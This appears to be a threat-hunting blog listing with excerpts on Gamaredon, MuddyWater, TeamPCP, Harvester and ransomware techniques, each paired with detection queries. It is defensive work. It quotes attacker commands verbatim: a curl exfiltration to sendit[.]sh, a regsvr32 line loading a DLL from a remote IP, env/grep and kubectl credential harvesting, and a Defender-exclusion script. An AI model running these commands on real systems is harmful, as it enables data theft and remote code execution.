Know Your Adversary

Hello everyone! Today we’ll take a look at several procedures observed in relatively recent Gamaredon (Disastrous Werewolf, Primitive Bear, Armageddon, Shuckworm, Aqua Blizzard) campaigns . As before, the attackers used phishing emails for initial access. The emails contained archives exploiting the CVE-2025-8088 vulnerability in WinRAR. After successful exploitation, a malicious VBS file - for example, 1_13_4_1882_18.03.2026.vbs  - was copied into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ . We can search for suspicious VBS file creation events in this folder: event_type: "filecreatewin" AND file_path: ("programs\\startup" AND *.vbs) Next, the VBS file downloads a malicious HTA file from Cloudflare Workers. For example, we can look for wscript.exe communications with the corresponding domains: event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "wscript.exe" The HTA file is downloaded into the %TEMP...

Hello everyone! I really enjoy spotting various legitimate services that attackers abuse. Today we’ll look at another such example within the context of the Exfiltration to Cloud Storage technique (T1567.002) . According to this report, MuddyWater (Nebulous Werewolf, Seedworm, TEMP.Zagros, Static Kitten, Mercury, TA450, Cobalt Ulster, Earth Vetala, Mango Sandstorm, Boggy Serpens) abused the sendit[.]sh service for data exfiltration. The service allows uploading files up to 10 GB using the command line: curl.exe -F "file=@C:\Windows\Temp\<artifact>" hxxps://sendit[.]sh As with other similar services, you can look for suspicious communications with it - for example, outbound connections initiated by cURL: event_type: "dnsreqwin" AND dns_rname: "sendit.sh" AND proc_file_path: "curl.exe" See you soon!

Hello everyone! What do I know about stealers? They seem to be very noisy! And today, we’ll once again see that in action using TeamPCP (Haze Wolf) as an example. This time , the stealer was implanted by attackers into three versions of the xinference package (2.6.0, 2.6.1, and 2.6.2). Essentially, it collects SSH keys, various credentials, environment variables, crypto wallets, and much more, then uses cURL for exfiltration. Let’s take a look at a couple of techniques the attackers used to obtain credentials. For example, they were interested in data stored in environment variables: env | grep AWS_ env | grep -i google env | grep -i gcloud env | grep -i azure This looks fairly suspicious from a detection perspective: event_type: processcreate* AND proc_file_path: "env" AND cmdline: ("grep" AND ("aws_" OR "google" OR "azure" OR "gcloud")) Another technique was abusing kubectl to obtain credentials: kubectl get secrets --all-n...

Hello everyone! Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004). This time, according to the report , the attackers prompted the victim to run the following command: C:\WINDOWS\system32\cmd.exe /c cmdkey /add:151.245.195[.]142 /user:guest && start regsvr32 /s \\151.245.195[.]142\hi\demo.dll & REM I am not a robot – Cloudflare ID: d7f5a3335794c434 As you can see, before registering a malicious library from a remote server using regsvr32.exe , the attackers use cmdkey.exe to store credentials for accessing that server. And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager: event_type: "processcreatewin" AND proc_file_path: "cmdkey.exe" AND cmdline: "add" See you soon!

Hello everyone! Another group has started using social engineering to deliver a Linux backdoor - though in this case, they essentially rewrote a Windows version of it. Let’s take a look at the techniques they used and how they can be detected or proactively hunted. This time, the source of information is a report by the Symantec and Carbon Black Threat Hunter Team on a group called Harvester . To disguise a malicious ELF file, the attackers used the Masquerade File Type (T1036.008) technique by giving the malicious file a “. pdf” extension—for example, “Details Format. pdf”. As you can see, there’s a space after the dot, which creates an opportunity for detection: Look for events involving the creation or execution of suspicious files with the “. pdf” extension. The attackers used two persistence methods on the compromised system. First, the GoGra backdoor creates a new service at ~/.config/systemd/user/userservice ( Systemd Service (T1543.002) ). Second, it creates an autostart entr...

Hello everyone! Today we’ll talk about another forensic tool that attackers used in the context of the Impair Defenses technique: Disable or Modify Tools (T1562.001) . Once again, the topic is ransomware. This time, we’re looking at the STAC4713 cluster, which distributes the PayoutsKing ransomware. To add exclusions to Windows Defender, the attackers used FTK Imager - a forensic tool designed for creating disk images. The key point is that during installation, this tool allows a selected path to be added to exclusions, which is exactly what the attackers exploited. The following command is executed: powershell -command $ExclusionType;$ExclusionFile = '"ExterroExclusions.txt"';if(Test-Path -path $ExclusionFile ){ $Exclusions = Get-Content $ExclusionFile; foreach ($Item in $Exclusions ) { $ItemTrimmed = $Item.trim(); if($Item.length -gt 0){ if($ItemTrimmed.StartsWith('-')) { $ExclusionType = $ItemTrimmed; Write-Host $ExclusionType; } elseif ( !($ItemTrimmed.St...